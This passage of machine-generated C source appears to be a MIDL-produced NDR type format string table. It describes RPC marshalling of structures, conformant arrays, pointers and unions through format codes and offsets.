			0x0,		/* 0 */
/* 1344 */	NdrFcShort( 0xffe6 ),	/* Offset= -26 (1318) */
/* 1346 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 1348 */
			0x15,		/* FC_STRUCT */
			0x7,		/* 7 */
/* 1350 */	NdrFcShort( 0x20 ),	/* 32 */
/* 1352 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 1354 */	NdrFcShort( 0xfac2 ),	/* Offset= -1342 (12) */
/* 1356 */	0xb,		/* FC_HYPER */
			0xb,		/* FC_HYPER */
/* 1358 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 1360 */
			0x1b,		/* FC_CARRAY */
			0x7,		/* 7 */
/* 1362 */	NdrFcShort( 0x20 ),	/* 32 */
/* 1364 */	0x9,		/* Corr desc: FC_ULONG */
			0x0,		/*  */
/* 1366 */	NdrFcShort( 0xfff8 ),	/* -8 */
/* 1368 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 1370 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 1372 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1376 */	NdrFcLong( 0x100000 ),	/* 1048576 */
/* 1380 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 1382 */	NdrFcShort( 0xffde ),	/* Offset= -34 (1348) */
/* 1384 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 1386 */
			0x17,		/* FC_CSTRUCT */
			0x7,		/* 7 */
/* 1388 */	NdrFcShort( 0x10 ),	/* 16 */
/* 1390 */	NdrFcShort( 0xffe2 ),	/* Offset= -30 (1360) */
/* 1392 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 1394 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 1396 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 1398 */	0xb1,		/* FC_FORCED_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 1400 */	NdrFcShort( 0x30 ),	/* 48 */
/* 1402 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1404 */	NdrFcShort( 0x0 ),	/* Offset= 0 (1404) */
/* 1406 */	0xb,		/* FC_HYPER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 1408 */	0x0,		/* 0 */
			NdrFcShort( 0xfef7 ),	/* Offset= -265 (1144) */
			0x5b,		/* FC_END */
/* 1412 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 1414 */	NdrFcShort( 0x58 ),	/* 88 */
/* 1416 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1418 */	NdrFcShort( 0x10 ),	/* Offset= 16 (1434) */
/* 1420 */	0x36,		/* FC_POINTER */
			0x8,		/* FC_LONG */
/* 1422 */	0x40,		/* FC_STRUCTPAD4 */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 1424 */	0x0,		/* 0 */
			NdrFcShort( 0xfe3f ),	/* Offset= -449 (976) */
			0x8,		/* FC_LONG */
/* 1428 */	0x40,		/* FC_STRUCTPAD4 */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 1430 */	0x0,		/* 0 */
			NdrFcShort( 0xffdf ),	/* Offset= -33 (1398) */
			0x5b,		/* FC_END */
/* 1434 */
			0x12, 0x0,	/* FC_UP */
/* 1436 */	NdrFcShort( 0xfb06 ),	/* Offset= -1274 (162) */
/* 1438 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x7,		/* 7 */
/* 1440 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1442 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 1444 */	NdrFcShort( 0x94 ),	/* 148 */
/* 1446 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 1448 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 1450 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1454 */	NdrFcLong( 0x100000 ),	/* 1048576 */
/* 1458 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 1462 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 1464 */	0x0 ,
			0x0,		/* 0 */
/* 1466 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1470 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1474 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 1476 */	NdrFcShort( 0xffc0 ),	/* Offset= -64 (1412) */
/* 1478 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 1480 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 1482 */	NdrFcShort( 0xa8 ),	/* 168 */
/* 1484 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1486 */	NdrFcShort( 0x26 ),	/* Offset= 38 (1524) */
/* 1488 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 1490 */	NdrFcShort( 0xfa3a ),	/* Offset= -1478 (12) */
/* 1492 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 1494 */	NdrFcShort( 0xfa36 ),	/* Offset= -1482 (12) */
/* 1496 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 1498 */	0x0,		/* 0 */
			NdrFcShort( 0xfb77 ),	/* Offset= -1161 (338) */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 1502 */	0x0,		/* 0 */
			NdrFcShort( 0xfb73 ),	/* Offset= -1165 (338) */
			0x36,		/* FC_POINTER */
/* 1506 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 1508 */	NdrFcShort( 0xfbd6 ),	/* Offset= -1066 (442) */
/* 1510 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 1512 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 1514 */	0x36,		/* FC_POINTER */
			0x8,		/* FC_LONG */
/* 1516 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 1518 */	0x8,		/* FC_LONG */
			0x36,		/* FC_POINTER */
/* 1520 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 1522 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 1524 */
			0x12, 0x0,	/* FC_UP */
/* 1526 */	NdrFcShort( 0xfaac ),	/* Offset= -1364 (162) */
/* 1528 */
			0x12, 0x0,	/* FC_UP */
/* 1530 */	NdrFcShort( 0xff70 ),	/* Offset= -144 (1386) */
/* 1532 */
			0x12, 0x0,	/* FC_UP */
/* 1534 */	NdrFcShort( 0xfec2 ),	/* Offset= -318 (1216) */
/* 1536 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 1538 */	NdrFcShort( 0xff9c ),	/* Offset= -100 (1438) */
/* 1540 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 1542 */	NdrFcShort( 0x18 ),	/* 24 */
/* 1544 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1546 */	NdrFcShort( 0x0 ),	/* Offset= 0 (1546) */
/* 1548 */	0x8,		/* FC_LONG */
			0xd,		/* FC_ENUM16 */
/* 1550 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 1552 */	NdrFcShort( 0xff16 ),	/* Offset= -234 (1318) */
/* 1554 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 1556 */	0xb1,		/* FC_FORCED_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 1558 */	NdrFcShort( 0x48 ),	/* 72 */
/* 1560 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1562 */	NdrFcShort( 0x0 ),	/* Offset= 0 (1562) */
/* 1564 */	0xb,		/* FC_HYPER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 1566 */	0x0,		/* 0 */
			NdrFcShort( 0xfe59 ),	/* Offset= -423 (1144) */
			0x8,		/* FC_LONG */
/* 1570 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 1572 */	0x40,		/* FC_STRUCTPAD4 */
			0xb,		/* FC_HYPER */
/* 1574 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 1576 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 1578 */	NdrFcShort( 0x70 ),	/* 112 */
/* 1580 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1582 */	NdrFcShort( 0x10 ),	/* Offset= 16 (1598) */
/* 1584 */	0x36,		/* FC_POINTER */
			0x8,		/* FC_LONG */
/* 1586 */	0x40,		/* FC_STRUCTPAD4 */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 1588 */	0x0,		/* 0 */
			NdrFcShort( 0xfd9b ),	/* Offset= -613 (976) */
			0x8,		/* FC_LONG */
/* 1592 */	0x40,		/* FC_STRUCTPAD4 */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 1594 */	0x0,		/* 0 */
			NdrFcShort( 0xffd9 ),	/* Offset= -39 (1556) */
			0x5b,		/* FC_END */
/* 1598 */
			0x12, 0x0,	/* FC_UP */
/* 1600 */	NdrFcShort( 0xfa62 ),	/* Offset= -1438 (162) */
/* 1602 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x7,		/* 7 */
/* 1604 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1606 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 1608 */	NdrFcShort( 0x94 ),	/* 148 */
/* 1610 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 1612 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 1614 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1618 */	NdrFcLong( 0x100000 ),	/* 1048576 */
/* 1622 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 1626 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 1628 */	0x0 ,
			0x0,		/* 0 */
/* 1630 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1634 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1638 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 1640 */	NdrFcShort( 0xffc0 ),	/* Offset= -64 (1576) */
/* 1642 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 1644 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 1646 */	NdrFcShort( 0xa8 ),	/* 168 */
/* 1648 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1650 */	NdrFcShort( 0x26 ),	/* Offset= 38 (1688) */
/* 1652 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 1654 */	NdrFcShort( 0xf996 ),	/* Offset= -1642 (12) */
/* 1656 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 1658 */	NdrFcShort( 0xf992 ),	/* Offset= -1646 (12) */
/* 1660 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 1662 */	0x0,		/* 0 */
			NdrFcShort( 0xfad3 ),	/* Offset= -1325 (338) */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 1666 */	0x0,		/* 0 */
			NdrFcShort( 0xfacf ),	/* Offset= -1329 (338) */
			0x36,		/* FC_POINTER */
/* 1670 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 1672 */	NdrFcShort( 0xfb32 ),	/* Offset= -1230 (442) */
/* 1674 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 1676 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 1678 */	0x36,		/* FC_POINTER */
			0x8,		/* FC_LONG */
/* 1680 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 1682 */	0x8,		/* FC_LONG */
			0x36,		/* FC_POINTER */
/* 1684 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 1686 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 1688 */
			0x12, 0x0,	/* FC_UP */
/* 1690 */	NdrFcShort( 0xfa08 ),	/* Offset= -1528 (162) */
/* 1692 */
			0x12, 0x0,	/* FC_UP */
/* 1694 */	NdrFcShort( 0xfecc ),	/* Offset= -308 (1386) */
/* 1696 */
			0x12, 0x0,	/* FC_UP */
/* 1698 */	NdrFcShort( 0xfe1e ),	/* Offset= -482 (1216) */
/* 1700 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 1702 */	NdrFcShort( 0xff9c ),	/* Offset= -100 (1602) */
/* 1704 */
			0x11, 0x0,	/* FC_RP */
/* 1706 */	NdrFcShort( 0x2 ),	/* Offset= 2 (1708) */
/* 1708 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 1710 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 1712 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 1714 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 1716 */	0x0 ,
			0x0,		/* 0 */
/* 1718 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1722 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1726 */	NdrFcShort( 0x2 ),	/* Offset= 2 (1728) */
/* 1728 */	NdrFcShort( 0x40 ),	/* 64 */
/* 1730 */	NdrFcShort( 0x2 ),	/* 2 */
/* 1732 */	NdrFcLong( 0x1 ),	/* 1 */
/* 1736 */	NdrFcShort( 0xa ),	/* Offset= 10 (1746) */
/* 1738 */	NdrFcLong( 0x2 ),	/* 2 */
/* 1742 */	NdrFcShort( 0x1e ),	/* Offset= 30 (1772) */
/* 1744 */	NdrFcShort( 0xffff ),	/* Offset= -1 (1743) */
/* 1746 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 1748 */	NdrFcShort( 0x28 ),	/* 40 */
/* 1750 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1752 */	NdrFcShort( 0xc ),	/* Offset= 12 (1764) */
/* 1754 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 1756 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 1758 */	NdrFcShort( 0xf92e ),	/* Offset= -1746 (12) */
/* 1760 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 1762 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 1764 */
			0x11, 0x0,	/* FC_RP */
/* 1766 */	NdrFcShort( 0xf9bc ),	/* Offset= -1604 (162) */
/* 1768 */
			0x11, 0x8,	/* FC_RP [simple_pointer] */
/* 1770 */
			0x22,		/* FC_C_CSTRING */
			0x5c,		/* FC_PAD */
/* 1772 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 1774 */	NdrFcShort( 0x40 ),	/* 64 */
/* 1776 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1778 */	NdrFcShort( 0x10 ),	/* Offset= 16 (1794) */
/* 1780 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 1782 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 1784 */	NdrFcShort( 0xf914 ),	/* Offset= -1772 (12) */
/* 1786 */	0x8,		/* FC_LONG */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 1788 */	0x0,		/* 0 */
			NdrFcShort( 0xf90f ),	/* Offset= -1777 (12) */
			0x40,		/* FC_STRUCTPAD4 */
/* 1792 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 1794 */
			0x11, 0x0,	/* FC_RP */
/* 1796 */	NdrFcShort( 0xf99e ),	/* Offset= -1634 (162) */
/* 1798 */
			0x11, 0x8,	/* FC_RP [simple_pointer] */
/* 1800 */
			0x22,		/* FC_C_CSTRING */
			0x5c,		/* FC_PAD */
/* 1802 */
			0x12, 0x0,	/* FC_UP */
/* 1804 */	NdrFcShort( 0xf9d8 ),	/* Offset= -1576 (228) */
/* 1806 */
			0x11, 0x0,	/* FC_RP */
/* 1808 */	NdrFcShort( 0x2 ),	/* Offset= 2 (1810) */
/* 1810 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 1812 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 1814 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 1816 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 1818 */	0x0 ,
			0x0,		/* 0 */
/* 1820 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1824 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1828 */	NdrFcShort( 0x2 ),	/* Offset= 2 (1830) */
/* 1830 */	NdrFcShort( 0x90 ),	/* 144 */
/* 1832 */	NdrFcShort( 0x3 ),	/* 3 */
/* 1834 */	NdrFcLong( 0x1 ),	/* 1 */
/* 1838 */	NdrFcShort( 0x20 ),	/* Offset= 32 (1870) */
/* 1840 */	NdrFcLong( 0x2 ),	/* 2 */
/* 1844 */	NdrFcShort( 0x32 ),	/* Offset= 50 (1894) */
/* 1846 */	NdrFcLong( 0x3 ),	/* 3 */
/* 1850 */	NdrFcShort( 0x4e ),	/* Offset= 78 (1928) */
/* 1852 */	NdrFcShort( 0xffff ),	/* Offset= -1 (1851) */
/* 1854 */
			0x1d,		/* FC_SMFARRAY */
			0x0,		/* 0 */
/* 1856 */	NdrFcShort( 0x54 ),	/* 84 */
/* 1858 */	0x2,		/* FC_CHAR */
			0x5b,		/* FC_END */
/* 1860 */
			0x15,		/* FC_STRUCT */
			0x0,		/* 0 */
/* 1862 */	NdrFcShort( 0x54 ),	/* 84 */
/* 1864 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 1866 */	NdrFcShort( 0xfff4 ),	/* Offset= -12 (1854) */
/* 1868 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 1870 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 1872 */	NdrFcShort( 0x68 ),	/* 104 */
/* 1874 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1876 */	NdrFcShort( 0xa ),	/* Offset= 10 (1886) */
/* 1878 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 1880 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 1882 */	NdrFcShort( 0xffea ),	/* Offset= -22 (1860) */
/* 1884 */	0x8,		/* FC_LONG */
			0x5b,		/* FC_END */
/* 1886 */
			0x11, 0x0,	/* FC_RP */
/* 1888 */	NdrFcShort( 0xf942 ),	/* Offset= -1726 (162) */
/* 1890 */
			0x11, 0x8,	/* FC_RP [simple_pointer] */
/* 1892 */
			0x22,		/* FC_C_CSTRING */
			0x5c,		/* FC_PAD */
/* 1894 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 1896 */	NdrFcShort( 0x78 ),	/* 120 */
/* 1898 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1900 */	NdrFcShort( 0xc ),	/* Offset= 12 (1912) */
/* 1902 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 1904 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 1906 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 1908 */	NdrFcShort( 0xffd0 ),	/* Offset= -48 (1860) */
/* 1910 */	0x8,		/* FC_LONG */
			0x5b,		/* FC_END */
/* 1912 */
			0x11, 0x0,	/* FC_RP */
/* 1914 */	NdrFcShort( 0xf928 ),	/* Offset= -1752 (162) */
/* 1916 */
			0x12, 0x0,	/* FC_UP */
/* 1918 */	NdrFcShort( 0xf924 ),	/* Offset= -1756 (162) */
/* 1920 */
			0x12, 0x0,	/* FC_UP */
/* 1922 */	NdrFcShort( 0xf920 ),	/* Offset= -1760 (162) */
/* 1924 */
			0x11, 0x8,	/* FC_RP [simple_pointer] */
/* 1926 */
			0x22,		/* FC_C_CSTRING */
			0x5c,		/* FC_PAD */
/* 1928 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 1930 */	NdrFcShort( 0x90 ),	/* 144 */
/* 1932 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1934 */	NdrFcShort( 0x12 ),	/* Offset= 18 (1952) */
/* 1936 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 1938 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 1940 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 1942 */	NdrFcShort( 0xffae ),	/* Offset= -82 (1860) */
/* 1944 */	0x8,		/* FC_LONG */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 1946 */	0x0,		/* 0 */
			NdrFcShort( 0xf871 ),	/* Offset= -1935 (12) */
			0x36,		/* FC_POINTER */
/* 1950 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 1952 */
			0x11, 0x0,	/* FC_RP */
/* 1954 */	NdrFcShort( 0xf900 ),	/* Offset= -1792 (162) */
/* 1956 */
			0x12, 0x0,	/* FC_UP */
/* 1958 */	NdrFcShort( 0xf8fc ),	/* Offset= -1796 (162) */
/* 1960 */
			0x12, 0x0,	/* FC_UP */
/* 1962 */	NdrFcShort( 0xf8f8 ),	/* Offset= -1800 (162) */
/* 1964 */
			0x11, 0x8,	/* FC_RP [simple_pointer] */
/* 1966 */
			0x22,		/* FC_C_CSTRING */
			0x5c,		/* FC_PAD */
/* 1968 */
			0x12, 0x0,	/* FC_UP */
/* 1970 */	NdrFcShort( 0xf932 ),	/* Offset= -1742 (228) */
/* 1972 */
			0x11, 0x0,	/* FC_RP */
/* 1974 */	NdrFcShort( 0x2 ),	/* Offset= 2 (1976) */
/* 1976 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 1978 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 1980 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 1982 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 1984 */	0x0 ,
			0x0,		/* 0 */
/* 1986 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1990 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1994 */	NdrFcShort( 0x2 ),	/* Offset= 2 (1996) */
/* 1996 */	NdrFcShort( 0x18 ),	/* 24 */
/* 1998 */	NdrFcShort( 0x1 ),	/* 1 */
/* 2000 */	NdrFcLong( 0x1 ),	/* 1 */
/* 2004 */	NdrFcShort( 0x4 ),	/* Offset= 4 (2008) */
/* 2006 */	NdrFcShort( 0xffff ),	/* Offset= -1 (2005) */
/* 2008 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 2010 */	NdrFcShort( 0x18 ),	/* 24 */
/* 2012 */	NdrFcShort( 0x0 ),	/* 0 */
/* 2014 */	NdrFcShort( 0x8 ),	/* Offset= 8 (2022) */
/* 2016 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 2018 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 2020 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 2022 */
			0x11, 0x0,	/* FC_RP */
/* 2024 */	NdrFcShort( 0xf8ba ),	/* Offset= -1862 (162) */
/* 2026 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 2028 */
			0x22,		/* FC_C_CSTRING */
			0x5c,		/* FC_PAD */
/* 2030 */
			0x11, 0x0,	/* FC_RP */
/* 2032 */	NdrFcShort( 0x2 ),	/* Offset= 2 (2034) */
/* 2034 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 2036 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 2038 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 2040 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 2042 */	0x0 ,
			0x0,		/* 0 */
/* 2044 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2048 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2052 */	NdrFcShort( 0x2 ),	/* Offset= 2 (2054) */
/* 2054 */	NdrFcShort( 0x80 ),	/* 128 */
/* 2056 */	NdrFcShort( 0x1 ),	/* 1 */
/* 2058 */	NdrFcLong( 0x1 ),	/* 1 */
/* 2062 */	NdrFcShort( 0x4 ),	/* Offset= 4 (2066) */
/* 2064 */	NdrFcShort( 0xffff ),	/* Offset= -1 (2063) */
/* 2066 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 2068 */	NdrFcShort( 0x80 ),	/* 128 */
/* 2070 */	NdrFcShort( 0x0 ),	/* 0 */
/* 2072 */	NdrFcShort( 0x10 ),	/* Offset= 16 (2088) */
/* 2074 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 2076 */	0x0,		/* 0 */
			NdrFcShort( 0xf7ef ),	/* Offset= -2065 (12) */
			0x36,		/* FC_POINTER */
/* 2080 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 2082 */	NdrFcShort( 0xff22 ),	/* Offset= -222 (1860) */
/* 2084 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 2086 */	0x8,		/* FC_LONG */
			0x5b,		/* FC_END */
/* 2088 */
			0x11, 0x0,	/* FC_RP */
/* 2090 */	NdrFcShort( 0xf878 ),	/* Offset= -1928 (162) */
/* 2092 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 2094 */
			0x22,		/* FC_C_CSTRING */
			0x5c,		/* FC_PAD */
/* 2096 */
			0x11, 0x0,	/* FC_RP */
/* 2098 */	NdrFcShort( 0x2 ),	/* Offset= 2 (2100) */
/* 2100 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 2102 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 2104 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 2106 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 2108 */	0x0 ,
			0x0,		/* 0 */
/* 2110 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2114 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2118 */	NdrFcShort( 0x2 ),	/* Offset= 2 (2120) */
/* 2120 */	NdrFcShort( 0x30 ),	/* 48 */
/* 2122 */	NdrFcShort( 0x1 ),	/* 1 */
/* 2124 */	NdrFcLong( 0x1 ),	/* 1 */
/* 2128 */	NdrFcShort( 0x2e ),	/* Offset= 46 (2174) */
/* 2130 */	NdrFcShort( 0xffff ),	/* Offset= -1 (2129) */
/* 2132 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x3,		/* 3 */
/* 2134 */	NdrFcShort( 0x0 ),	/* 0 */
/* 2136 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 2138 */	NdrFcShort( 0x4 ),	/* 4 */
/* 2140 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 2142 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 2144 */	NdrFcLong( 0x1 ),	/* 1 */
/* 2148 */	NdrFcLong( 0x2710 ),	/* 10000 */
/* 2152 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 2156 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 2158 */	0x0 ,
			0x0,		/* 0 */
/* 2160 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2164 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2168 */
			0x12, 0x0,	/* FC_UP */
/* 2170 */	NdrFcShort( 0xf828 ),	/* Offset= -2008 (162) */
/* 2172 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 2174 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 2176 */	NdrFcShort( 0x30 ),	/* 48 */
/* 2178 */	NdrFcShort( 0x0 ),	/* 0 */
/* 2180 */	NdrFcShort( 0xe ),	/* Offset= 14 (2194) */
/* 2182 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 2184 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 2186 */	0x0,		/* 0 */
			NdrFcShort( 0xfbc9 ),	/* Offset= -1079 (1108) */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 2190 */	0x0,		/* 0 */
			NdrFcShort( 0xf92b ),	/* Offset= -1749 (442) */
			0x5b,		/* FC_END */
/* 2194 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 2196 */	NdrFcShort( 0xffc0 ),	/* Offset= -64 (2132) */
/* 2198 */
			0x11, 0x4,	/* FC_RP [alloced_on_stack] */
/* 2200 */	NdrFcShort( 0x2 ),	/* Offset= 2 (2202) */
/* 2202 */
